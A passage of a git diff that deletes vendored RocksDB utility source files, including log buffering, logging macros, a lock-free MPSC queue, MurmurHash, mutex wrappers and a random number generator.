-#include <map>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace stl_wrappers {
-
-struct LessOfComparator {
-  explicit LessOfComparator(const Comparator* c = BytewiseComparator())
-      : cmp(c) {}
-
-  bool operator()(const std::string& a, const std::string& b) const {
-    return cmp->Compare(Slice(a), Slice(b)) < 0;
-  }
-  bool operator()(const Slice& a, const Slice& b) const {
-    return cmp->Compare(a, b) < 0;
-  }
-
-  const Comparator* cmp;
-};
-
-typedef std::map<std::string, std::string, LessOfComparator> KVMap;
-}
-}
diff --git a/thirdparty/rocksdb/util/log_buffer.cc b/thirdparty/rocksdb/util/log_buffer.cc
deleted file mode 100644
index d09e0cb..0000000
--- a/thirdparty/rocksdb/util/log_buffer.cc
+++ /dev/null
@@ -1,93 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/log_buffer.h"
-
-#include "port/sys_time.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-LogBuffer::LogBuffer(const InfoLogLevel log_level,
-                     Logger*info_log)
-    : log_level_(log_level), info_log_(info_log) {}
-
-void LogBuffer::AddLogToBuffer(size_t max_log_size, const char* format,
-                               va_list ap) {
-  if (!info_log_ || log_level_ < info_log_->GetInfoLogLevel()) {
-    // Skip the level because of its level.
-    return;
-  }
-
-  char* alloc_mem = arena_.AllocateAligned(max_log_size);
-  BufferedLog* buffered_log = new (alloc_mem) BufferedLog();
-  char* p = buffered_log->message;
-  char* limit = alloc_mem + max_log_size - 1;
-
-  // store the time
-  gettimeofday(&(buffered_log->now_tv), nullptr);
-
-  // Print the message
-  if (p < limit) {
-    va_list backup_ap;
-    va_copy(backup_ap, ap);
-    auto n = vsnprintf(p, limit - p, format, backup_ap);
-#ifndef OS_WIN
-    // MS reports -1 when the buffer is too short
-    assert(n >= 0);
-#endif
-    if (n > 0) {
-      p += n;
-    } else {
-      p = limit;
-    }
-    va_end(backup_ap);
-  }
-
-  if (p > limit) {
-    p = limit;
-  }
-
-  // Add '\0' to the end
-  *p = '\0';
-
-  logs_.push_back(buffered_log);
-}
-
-void LogBuffer::FlushBufferToLog() {
-  for (BufferedLog* log : logs_) {
-    const time_t seconds = log->now_tv.tv_sec;
-    struct tm t;
-    if (localtime_r(&seconds, &t) != nullptr) {
-      Log(log_level_, info_log_,
-          "(Original Log Time %04d/%02d/%02d-%02d:%02d:%02d.%06d) %s",
-          t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour, t.tm_min,
-          t.tm_sec, static_cast<int>(log->now_tv.tv_usec), log->message);
-    }
-  }
-  logs_.clear();
-}
-
-void LogToBuffer(LogBuffer* log_buffer, size_t max_log_size, const char* format,
-                 ...) {
-  if (log_buffer != nullptr) {
-    va_list ap;
-    va_start(ap, format);
-    log_buffer->AddLogToBuffer(max_log_size, format, ap);
-    va_end(ap);
-  }
-}
-
-void LogToBuffer(LogBuffer* log_buffer, const char* format, ...) {
-  const size_t kDefaultMaxLogSize = 512;
-  if (log_buffer != nullptr) {
-    va_list ap;
-    va_start(ap, format);
-    log_buffer->AddLogToBuffer(kDefaultMaxLogSize, format, ap);
-    va_end(ap);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/log_buffer.h b/thirdparty/rocksdb/util/log_buffer.h
deleted file mode 100644
index e356b93..0000000
--- a/thirdparty/rocksdb/util/log_buffer.h
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/env.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "port/sys_time.h"
-#include <ctime>
-
-namespace rocksdb {
-
-class Logger;
-
-// A class to buffer info log entries and flush them in the end.
-class LogBuffer {
- public:
-  // log_level: the log level for all the logs
-  // info_log:  logger to write the logs to
-  LogBuffer(const InfoLogLevel log_level, Logger* info_log);
-
-  // Add a log entry to the buffer. Use default max_log_size.
-  // max_log_size indicates maximize log size, including some metadata.
-  void AddLogToBuffer(size_t max_log_size, const char* format, va_list ap);
-
-  size_t IsEmpty() const { return logs_.empty(); }
-
-  // Flush all buffered log to the info log.
-  void FlushBufferToLog();
-
- private:
-  // One log entry with its timestamp
-  struct BufferedLog {
-    struct timeval now_tv;  // Timestamp of the log
-    char message[1];        // Beginning of log message
-  };
-
-  const InfoLogLevel log_level_;
-  Logger* info_log_;
-  Arena arena_;
-  autovector<BufferedLog*> logs_;
-};
-
-// Add log to the LogBuffer for a delayed info logging. It can be used when
-// we want to add some logs inside a mutex.
-// max_log_size indicates maximize log size, including some metadata.
-extern void LogToBuffer(LogBuffer* log_buffer, size_t max_log_size,
-                        const char* format, ...);
-// Same as previous function, but with default max log size.
-extern void LogToBuffer(LogBuffer* log_buffer, const char* format, ...);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/log_write_bench.cc b/thirdparty/rocksdb/util/log_write_bench.cc
deleted file mode 100644
index 4008e43..0000000
--- a/thirdparty/rocksdb/util/log_write_bench.cc
+++ /dev/null
@@ -1,84 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-// A simple benchmark to simulate transactional logs
-
-DEFINE_int32(num_records, 6000, "Number of records.");
-DEFINE_int32(record_size, 249, "Size of each record.");
-DEFINE_int32(record_interval, 10000, "Interval between records (microSec)");
-DEFINE_int32(bytes_per_sync, 0, "bytes_per_sync parameter in EnvOptions");
-DEFINE_bool(enable_sync, false, "sync after each write.");
-
-namespace rocksdb {
-void RunBenchmark() {
-  std::string file_name = test::TmpDir() + "/log_write_benchmark.log";
-  Env* env = Env::Default();
-  EnvOptions env_options = env->OptimizeForLogWrite(EnvOptions());
-  env_options.bytes_per_sync = FLAGS_bytes_per_sync;
-  unique_ptr<WritableFile> file;
-  env->NewWritableFile(file_name, &file, env_options);
-  unique_ptr<WritableFileWriter> writer;
-  writer.reset(new WritableFileWriter(std::move(file), env_options));
-
-  std::string record;
-  record.assign(FLAGS_record_size, 'X');
-
-  HistogramImpl hist;
-
-  uint64_t start_time = env->NowMicros();
-  for (int i = 0; i < FLAGS_num_records; i++) {
-    uint64_t start_nanos = env->NowNanos();
-    writer->Append(record);
-    writer->Flush();
-    if (FLAGS_enable_sync) {
-      writer->Sync(false);
-    }
-    hist.Add(env->NowNanos() - start_nanos);
-
-    if (i % 1000 == 1) {
-      fprintf(stderr, "Wrote %d records...\n", i);
-    }
-
-    int time_to_sleep =
-        (i + 1) * FLAGS_record_interval - (env->NowMicros() - start_time);
-    if (time_to_sleep > 0) {
-      env->SleepForMicroseconds(time_to_sleep);
-    }
-  }
-
-  fprintf(stderr, "Distribution of latency of append+flush: \n%s",
-          hist.ToString().c_str());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  rocksdb::RunBenchmark();
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/logging.h b/thirdparty/rocksdb/util/logging.h
deleted file mode 100644
index 992e001..0000000
--- a/thirdparty/rocksdb/util/logging.h
+++ /dev/null
@@ -1,50 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Must not be included from any .h files to avoid polluting the namespace
-// with macros.
-
-#pragma once
-#include "port/port.h"
-
-// Helper macros that include information about file name and line number
-#define STRINGIFY(x) #x
-#define TOSTRING(x) STRINGIFY(x)
-#define PREPEND_FILE_LINE(FMT) ("[" __FILE__ ":" TOSTRING(__LINE__) "] " FMT)
-
-// Don't inclide file/line info in HEADER level
-#define ROCKS_LOG_HEADER(LGR, FMT, ...) \
-  rocksdb::Log(InfoLogLevel::HEADER_LEVEL, LGR, FMT, ##__VA_ARGS__)
-
-#define ROCKS_LOG_DEBUG(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::DEBUG_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_INFO(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::INFO_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_WARN(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::WARN_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_ERROR(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::ERROR_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_FATAL(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::FATAL_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_BUFFER(LOG_BUF, FMT, ...) \
-  rocksdb::LogToBuffer(LOG_BUF, PREPEND_FILE_LINE(FMT), ##__VA_ARGS__)
-
-#define ROCKS_LOG_BUFFER_MAX_SZ(LOG_BUF, MAX_LOG_SIZE, FMT, ...)      \
-  rocksdb::LogToBuffer(LOG_BUF, MAX_LOG_SIZE, PREPEND_FILE_LINE(FMT), \
-                       ##__VA_ARGS__)
diff --git a/thirdparty/rocksdb/util/memory_usage.h b/thirdparty/rocksdb/util/memory_usage.h
deleted file mode 100644
index 0d88544..0000000
--- a/thirdparty/rocksdb/util/memory_usage.h
+++ /dev/null
@@ -1,25 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <unordered_map>
-
-namespace rocksdb {
-
-// Helper methods to estimate memroy usage by std containers.
-
-template <class Key, class Value, class Hash>
-size_t ApproximateMemoryUsage(
-    const std::unordered_map<Key, Value, Hash>& umap) {
-  typedef std::unordered_map<Key, Value, Hash> Map;
-  return sizeof(umap) +
-         // Size of all items plus a next pointer for each item.
-         (sizeof(typename Map::value_type) + sizeof(void*)) * umap.size() +
-         // Size of hash buckets.
-         umap.bucket_count() * sizeof(void*);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/mpsc.h b/thirdparty/rocksdb/util/mpsc.h
deleted file mode 100644
index 7449fd3..0000000
--- a/thirdparty/rocksdb/util/mpsc.h
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Large parts of this file is borrowed from the public domain code below.
-// from https://github.com/mstump/queues
-
-// C++ implementation of Dmitry Vyukov's non-intrusive
-// lock free unbound MPSC queue
-// http://www.1024cores.net/home/
-// lock-free-algorithms/queues/non-intrusive-mpsc-node-based-queue
-
-// License from mstump/queues
-// This is free and unencumbered software released into the public domain.
-//
-// Anyone is free to copy, modify, publish, use, compile, sell, or
-// distribute this software, either in source code form or as a compiled
-// binary, for any purpose, commercial or non-commercial, and by any
-// means.
-//
-// In jurisdictions that recognize copyright laws, the author or authors
-// of this software dedicate any and all copyright interest in the
-// software to the public domain. We make this dedication for the benefit
-// of the public at large and to the detriment of our heirs and
-// successors. We intend this dedication to be an overt act of
-// relinquishment in perpetuity of all present and future rights to this
-// software under copyright law.
-//
-// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-// IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
-// OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
-// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
-// OTHER DEALINGS IN THE SOFTWARE.
-//
-// For more information, please refer to <http://unlicense.org>
-
-// License from http://www.1024cores.net/home/
-// lock-free-algorithms/queues/non-intrusive-mpsc-node-based-queue
-// Copyright (c) 2010-2011 Dmitry Vyukov. All rights reserved.
-// Redistribution and use in source and binary forms, with or
-// without modification, are permitted provided that the following
-// conditions are met:
-// 1. Redistributions of source code must retain the above copyright notice,
-// this list of conditions and the following disclaimer.
-//
-// 2. Redistributions in binary form must reproduce the above copyright notice,
-// this list of conditions and the following disclaimer in the documentation
-// and/or other materials provided with the distribution.
-//
-// THIS SOFTWARE IS PROVIDED BY DMITRY VYUKOV "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
-// OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
-// EVENT SHALL DMITRY VYUKOV OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-// INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-// BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
-// USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// The views and conclusions contained in the software and documentation
-// are those of the authors and should not be interpreted as representing
-// official policies, either expressed or implied, of Dmitry Vyukov.
-//
-
-#ifndef UTIL_MPSC_H_
-#define UTIL_MPSC_H_
-
-#include <atomic>
-#include <cassert>
-#include <type_traits>
-
-/**
- * Multiple Producer Single Consumer Lockless Q
- */
-template <typename T>
-class mpsc_queue_t {
- public:
-  struct buffer_node_t {
-    T data;
-    std::atomic<buffer_node_t*> next;
-  };
-
-  mpsc_queue_t() {
-    buffer_node_aligned_t* al_st = new buffer_node_aligned_t;
-    buffer_node_t* node = new (al_st) buffer_node_t();
-    _head.store(node);
-    _tail.store(node);
-
-    node->next.store(nullptr, std::memory_order_relaxed);
-  }
-
-  ~mpsc_queue_t() {
-    T output;
-    while (this->dequeue(&output)) {
-    }
-    buffer_node_t* front = _head.load(std::memory_order_relaxed);
-    front->~buffer_node_t();
-
-    ::operator delete(front);
-  }
-
-  void enqueue(const T& input) {
-    buffer_node_aligned_t* al_st = new buffer_node_aligned_t;
-    buffer_node_t* node = new (al_st) buffer_node_t();
-
-    node->data = input;
-    node->next.store(nullptr, std::memory_order_relaxed);
-
-    buffer_node_t* prev_head = _head.exchange(node, std::memory_order_acq_rel);
-    prev_head->next.store(node, std::memory_order_release);
-  }
-
-  bool dequeue(T* output) {
-    buffer_node_t* tail = _tail.load(std::memory_order_relaxed);
-    buffer_node_t* next = tail->next.load(std::memory_order_acquire);
-
-    if (next == nullptr) {
-      return false;
-    }
-
-    *output = next->data;
-    _tail.store(next, std::memory_order_release);
-
-    tail->~buffer_node_t();
-
-    ::operator delete(tail);
-    return true;
-  }
-
-  // you can only use pop_all if the queue is SPSC
-  buffer_node_t* pop_all() {
-    // nobody else can move the tail pointer.
-    buffer_node_t* tptr = _tail.load(std::memory_order_relaxed);
-    buffer_node_t* next =
-        tptr->next.exchange(nullptr, std::memory_order_acquire);
-    _head.exchange(tptr, std::memory_order_acquire);
-
-    // there is a race condition here
-    return next;
-  }
-
- private:
-  typedef typename std::aligned_storage<
-      sizeof(buffer_node_t), std::alignment_of<buffer_node_t>::value>::type
-      buffer_node_aligned_t;
-
-  std::atomic<buffer_node_t*> _head;
-  std::atomic<buffer_node_t*> _tail;
-
-  mpsc_queue_t(const mpsc_queue_t&) = delete;
-  mpsc_queue_t& operator=(const mpsc_queue_t&) = delete;
-};
-
-#endif  // UTIL_MPSC_H_
diff --git a/thirdparty/rocksdb/util/murmurhash.cc b/thirdparty/rocksdb/util/murmurhash.cc
deleted file mode 100644
index 4d71d58..0000000
--- a/thirdparty/rocksdb/util/murmurhash.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/*
-  Murmurhash from http://sites.google.com/site/murmurhash/
-
-  All code is released to the public domain. For business purposes, Murmurhash
-  is under the MIT license.
-*/
-#include "murmurhash.h"
-
-#if defined(__x86_64__)
-
-// -------------------------------------------------------------------
-//
-// The same caveats as 32-bit MurmurHash2 apply here - beware of alignment
-// and endian-ness issues if used across multiple platforms.
-//
-// 64-bit hash for 64-bit platforms
-
-uint64_t MurmurHash64A ( const void * key, int len, unsigned int seed )
-{
-    const uint64_t m = 0xc6a4a7935bd1e995;
-    const int r = 47;
-
-    uint64_t h = seed ^ (len * m);
-
-    const uint64_t * data = (const uint64_t *)key;
-    const uint64_t * end = data + (len/8);
-
-    while(data != end)
-    {
-        uint64_t k = *data++;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h ^= k;
-        h *= m;
-    }
-
-    const unsigned char * data2 = (const unsigned char*)data;
-
-    switch(len & 7)
-    {
-    case 7: h ^= ((uint64_t)data2[6]) << 48; // fallthrough
-    case 6: h ^= ((uint64_t)data2[5]) << 40; // fallthrough
-    case 5: h ^= ((uint64_t)data2[4]) << 32; // fallthrough
-    case 4: h ^= ((uint64_t)data2[3]) << 24; // fallthrough
-    case 3: h ^= ((uint64_t)data2[2]) << 16; // fallthrough
-    case 2: h ^= ((uint64_t)data2[1]) << 8; // fallthrough
-    case 1: h ^= ((uint64_t)data2[0]);
-        h *= m;
-    };
-
-    h ^= h >> r;
-    h *= m;
-    h ^= h >> r;
-
-    return h;
-}
-
-#elif defined(__i386__)
-
-// -------------------------------------------------------------------
-//
-// Note - This code makes a few assumptions about how your machine behaves -
-//
-// 1. We can read a 4-byte value from any address without crashing
-// 2. sizeof(int) == 4
-//
-// And it has a few limitations -
-//
-// 1. It will not work incrementally.
-// 2. It will not produce the same results on little-endian and big-endian
-//    machines.
-
-unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed )
-{
-    // 'm' and 'r' are mixing constants generated offline.
-    // They're not really 'magic', they just happen to work well.
-
-    const unsigned int m = 0x5bd1e995;
-    const int r = 24;
-
-    // Initialize the hash to a 'random' value
-
-    unsigned int h = seed ^ len;
-
-    // Mix 4 bytes at a time into the hash
-
-    const unsigned char * data = (const unsigned char *)key;
-
-    while(len >= 4)
-    {
-        unsigned int k = *(unsigned int *)data;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h *= m;
-        h ^= k;
-
-        data += 4;
-        len -= 4;
-    }
-
-    // Handle the last few bytes of the input array
-
-    switch(len)
-    {
-    case 3: h ^= data[2] << 16; // fallthrough
-    case 2: h ^= data[1] << 8; // fallthrough
-    case 1: h ^= data[0];
-        h *= m;
-    };
-
-    // Do a few final mixes of the hash to ensure the last few
-    // bytes are well-incorporated.
-
-    h ^= h >> 13;
-    h *= m;
-    h ^= h >> 15;
-
-    return h;
-}
-
-#else
-
-// -------------------------------------------------------------------
-//
-// Same as MurmurHash2, but endian- and alignment-neutral.
-// Half the speed though, alas.
-
-unsigned int MurmurHashNeutral2 ( const void * key, int len, unsigned int seed )
-{
-    const unsigned int m = 0x5bd1e995;
-    const int r = 24;
-
-    unsigned int h = seed ^ len;
-
-    const unsigned char * data = (const unsigned char *)key;
-
-    while(len >= 4)
-    {
-        unsigned int k;
-
-        k  = data[0];
-        k |= data[1] << 8;
-        k |= data[2] << 16;
-        k |= data[3] << 24;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h *= m;
-        h ^= k;
-
-        data += 4;
-        len -= 4;
-    }
-
-    switch(len)
-    {
-    case 3: h ^= data[2] << 16; // fallthrough
-    case 2: h ^= data[1] << 8; // fallthrough
-    case 1: h ^= data[0];
-        h *= m;
-    };
-
-    h ^= h >> 13;
-    h *= m;
-    h ^= h >> 15;
-
-    return h;
-}
-
-#endif
diff --git a/thirdparty/rocksdb/util/murmurhash.h b/thirdparty/rocksdb/util/murmurhash.h
deleted file mode 100644
index cbfc406..0000000
--- a/thirdparty/rocksdb/util/murmurhash.h
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/*
-  Murmurhash from http://sites.google.com/site/murmurhash/
-
-  All code is released to the public domain. For business purposes, Murmurhash
-  is under the MIT license.
-*/
-#pragma once
-#include <stdint.h>
-#include "rocksdb/slice.h"
-
-#if defined(__x86_64__)
-#define MURMUR_HASH MurmurHash64A
-uint64_t MurmurHash64A ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHash64A
-typedef uint64_t murmur_t;
-
-#elif defined(__i386__)
-#define MURMUR_HASH MurmurHash2
-unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHash2
-typedef unsigned int murmur_t;
-
-#else
-#define MURMUR_HASH MurmurHashNeutral2
-unsigned int MurmurHashNeutral2 ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHashNeutral2
-typedef unsigned int murmur_t;
-#endif
-
-// Allow slice to be hashable by murmur hash.
-namespace rocksdb {
-struct murmur_hash {
-  size_t operator()(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0);
-  }
-};
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/mutexlock.h b/thirdparty/rocksdb/util/mutexlock.h
deleted file mode 100644
index 640cef3..0000000
--- a/thirdparty/rocksdb/util/mutexlock.h
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <assert.h>
-#include <atomic>
-#include <mutex>
-#include <thread>
-#include "port/port.h"
-
-namespace rocksdb {
-
-// Helper class that locks a mutex on construction and unlocks the mutex when
-// the destructor of the MutexLock object is invoked.
-//
-// Typical usage:
-//
-//   void MyClass::MyMethod() {
-//     MutexLock l(&mu_);       // mu_ is an instance variable
-//     ... some complex code, possibly with multiple return paths ...
-//   }
-
-class MutexLock {
- public:
-  explicit MutexLock(port::Mutex *mu) : mu_(mu) {
-    this->mu_->Lock();
-  }
-  ~MutexLock() { this->mu_->Unlock(); }
-
- private:
-  port::Mutex *const mu_;
-  // No copying allowed
-  MutexLock(const MutexLock&);
-  void operator=(const MutexLock&);
-};
-
-//
-// Acquire a ReadLock on the specified RWMutex.
-// The Lock will be automatically released then the
-// object goes out of scope.
-//
-class ReadLock {
- public:
-  explicit ReadLock(port::RWMutex *mu) : mu_(mu) {
-    this->mu_->ReadLock();
-  }
-  ~ReadLock() { this->mu_->ReadUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  ReadLock(const ReadLock&);
-  void operator=(const ReadLock&);
-};
-
-//
-// Automatically unlock a locked mutex when the object is destroyed
-//
-class ReadUnlock {
- public:
-  explicit ReadUnlock(port::RWMutex *mu) : mu_(mu) { mu->AssertHeld(); }
-  ~ReadUnlock() { mu_->ReadUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  ReadUnlock(const ReadUnlock &) = delete;
-  ReadUnlock &operator=(const ReadUnlock &) = delete;
-};
-
-//
-// Acquire a WriteLock on the specified RWMutex.
-// The Lock will be automatically released then the
-// object goes out of scope.
-//
-class WriteLock {
- public:
-  explicit WriteLock(port::RWMutex *mu) : mu_(mu) {
-    this->mu_->WriteLock();
-  }
-  ~WriteLock() { this->mu_->WriteUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  WriteLock(const WriteLock&);
-  void operator=(const WriteLock&);
-};
-
-//
-// SpinMutex has very low overhead for low-contention cases.  Method names
-// are chosen so you can use std::unique_lock or std::lock_guard with it.
-//
-class SpinMutex {
- public:
-  SpinMutex() : locked_(false) {}
-
-  bool try_lock() {
-    auto currently_locked = locked_.load(std::memory_order_relaxed);
-    return !currently_locked &&
-           locked_.compare_exchange_weak(currently_locked, true,
-                                         std::memory_order_acquire,
-                                         std::memory_order_relaxed);
-  }
-
-  void lock() {
-    for (size_t tries = 0;; ++tries) {
-      if (try_lock()) {
-        // success
-        break;
-      }
-      port::AsmVolatilePause();
-      if (tries > 100) {
-        std::this_thread::yield();
-      }
-    }
-  }
-
-  void unlock() { locked_.store(false, std::memory_order_release); }
-
- private:
-  std::atomic<bool> locked_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/random.cc b/thirdparty/rocksdb/util/random.cc
deleted file mode 100644
index 5e2cf62..0000000
--- a/thirdparty/rocksdb/util/random.cc
+++ /dev/null
@@ -1,38 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "util/random.h"
-
-#include <stdint.h>
-#include <string.h>
-#include <thread>
-#include <utility>
-
-#include "port/likely.h"
-#include "util/thread_local.h"
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-#define STORAGE_DECL static __thread
-#else
-#define STORAGE_DECL static
-#endif
-
-namespace rocksdb {
-
-Random* Random::GetTLSInstance() {
-  STORAGE_DECL Random* tls_instance;
-  STORAGE_DECL std::aligned_storage<sizeof(Random)>::type tls_instance_bytes;
-
-  auto rv = tls_instance;
-  if (UNLIKELY(rv == nullptr)) {
-    size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-    rv = new (&tls_instance_bytes) Random((uint32_t)seed);
-    tls_instance = rv;
-  }
-  return rv;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/random.h b/thirdparty/rocksdb/util/random.h
deleted file mode 100644
index 2a5fcbc..0000000
--- a/thirdparty/rocksdb/util/random.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <random>
-#include <stdint.h>
-
-namespace rocksdb {
-
-// A very simple random number generator.  Not especially good at
-// generating truly random bits, but good enough for our needs in this
-// package.
-class Random {
- private:
-  enum : uint32_t {
-    M = 2147483647L  // 2^31-1
-  };
-  enum : uint64_t {
-    A = 16807  // bits 14, 8, 7, 5, 2, 1, 0
-  };
-
-  uint32_t seed_;
-
-  static uint32_t GoodSeed(uint32_t s) { return (s & M) != 0 ? (s & M) : 1; }
-
- public:
-  // This is the largest value that can be returned from Next()
-  enum : uint32_t { kMaxNext = M };
-
-  explicit Random(uint32_t s) : seed_(GoodSeed(s)) {}
-
-  void Reset(uint32_t s) { seed_ = GoodSeed(s); }
-
-  uint32_t Next() {
-    // We are computing
-    //       seed_ = (seed_ * A) % M,    where M = 2^31-1
-    //
-    // seed_ must not be zero or M, or else all subsequent computed values
-    // will be zero or M respectively.  For all other values, seed_ will end
-    // up cycling through every number in [1,M-1]
-    uint64_t product = seed_ * A;
-
-    // Compute (product % M) using the fact that ((x << 31) % M) == x.
-    seed_ = static_cast<uint32_t>((product >> 31) + (product & M));
-    // The first reduction may overflow by 1 bit, so we may need to
